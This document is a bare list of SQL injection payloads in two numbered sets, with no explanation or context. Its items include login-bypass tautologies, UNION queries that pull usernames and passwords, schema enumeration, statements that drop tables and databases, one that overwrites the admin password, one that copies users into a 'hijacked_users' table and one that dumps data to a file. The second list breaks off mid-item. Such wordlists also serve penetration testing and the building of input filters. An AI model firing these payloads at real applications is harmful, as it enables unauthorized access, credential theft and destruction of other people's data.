
1. ' OR 1=1 -- '
2. " OR 1=1 -- "
3. ') OR 1=1 -- '
4. ") OR 1=1 -- "
5. '; OR 1=1 -- '
6. ' OR 'x'='x'
7. " OR 'x'='x"
8. ') OR 'x'='x'
9. ") OR 'x'='x"
10. '; OR 'x'='x'
11. ' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--'
12. '; DROP TABLE users --'
13. '; SELECT * FROM information_schema.tables --'
14. ' OR 1=0 LIMIT 1 -- '
15. ' OR 1=1 LIMIT 1 -- '
16. " OR 1=0 LIMIT 1 -- "
17. " OR 1=1 LIMIT 1 -- "
18. ') OR 1=0 LIMIT 1 -- '
19. ") OR 1=1 LIMIT 1 -- "
20. '; OR 1=0 LIMIT 1 -- '
21. '; OR 1=1 LIMIT 1 -- '
22. "' OR 1=0 LIMIT 1 -- "
23. "' OR 1=1 LIMIT 1 -- "
24. ' AND 1=1'
25. ' AND 1=0'
26. ' OR 2>1 -- '
27. " OR 2>1 -- "
28. ') OR 2>1 -- '
29. ") OR 2>1 -- "
30. '; OR 2>1 -- '
31. ' OR 2>2 -- '
32. " OR 2>2 -- "
33. ') OR 2>2 -- '
34. ") OR 2>2 -- "
35. '; OR 2>2 -- '
36. "' OR 2>2 -- "
37. ' AND 2>1'
38. ' AND 2>2'
39. ' OR 1=1 ORDER BY 1--'
40. ' OR 1=1 ORDER BY 2--'
41. ' OR 1=1 ORDER BY 3--'
42. ' OR 1=1 ORDER BY 4--'
43. ' OR 1=1 ORDER BY 5--'
44. ' OR 1=1 ORDER BY 6--'
45. ' OR 1=1 ORDER BY 7--'
46. ' OR 1=1 ORDER BY 8--'
47. ' OR 1=1 ORDER BY 9--'
48. ' OR 1=1 GROUP BY 1--'
49. ' OR 1=1 GROUP BY 2--'
50. ' OR 1=1 GROUP BY 3--'









1. ' OR '1'='1

2. ' OR 1=1--

3. ' OR '1'='1' #

4. ' OR 1=1#

5. ' OR '1'='1'#

6. ' OR 1=1--#

7. " or ""="

8. " or ""="" or 1=1--

9. " or 1=1--

10. ' OR 1=1;--

11. ' OR '1'='1";--

12. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "%a%";--

13. ' UNION SELECT null, null, null, null, null, null, null, null, null, null FROM information_schema.tables;--

14. '; SELECT * FROM users WHERE name LIKE "a%";--

15. '; SELECT * FROM users WHERE name LIKE "%a%";--

16. '; SELECT * FROM users WHERE name LIKE "%a";--

17. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "%a%";--

18. '; DROP TABLE users;--

19. '; DROP DATABASE dbname;--

20. '; INSERT INTO users VALUES (1, "admin", "password");--

21. ' OR 1=1 LIMIT 1;--

22. ' UNION SELECT null, null, null, null, null, null, null, null, null, null FROM information_schema.tables LIMIT 1;--

23. '; SELECT * FROM information_schema.tables WHERE table_schema = "dbname";--

24. '; SELECT * FROM information_schema.columns WHERE table_name = "users";--

25. '; SELECT name, password FROM users WHERE id = 1;--

26. ' UNION SELECT name, password FROM users WHERE name LIKE "a%";--

27. ' UNION SELECT name, password FROM users WHERE name LIKE "%a%";--

28. ' UNION SELECT name, password FROM users WHERE name LIKE "%a";--

29. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "a%";--

30. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "%a";--

31. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "%a%";--

32. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "a";--

33. '; SELECT * FROM users WHERE name = "admin" AND password = "password";--

34. '; SELECT * FROM users WHERE name = "admin" OR 1=1;--

35. '; SELECT * FROM users WHERE id = 1 OR 1=1;--

36. ' AND 1=0 UNION SELECT name, password FROM users;--

37. ' AND 1=0 UNION SELECT name, password FROM users WHERE id = 1;--

38. '; CREATE TABLE hijacked_users (id int, name varchar(255), password varchar(255));--

39. '; INSERT INTO hijacked_users SELECT * FROM users WHERE name LIKE "a%";--

40. '; UPDATE users SET password = "newpassword" WHERE name = "admin";--

41. '; SELECT * FROM users WHERE name LIKE "a%" INTO OUTFILE "/tmp/users.txt";--

42. '; LOAD DATA INFILE "/tmp/users.txt" INTO TABLE users;--

43. '; SELECT * FROM users WHERE name
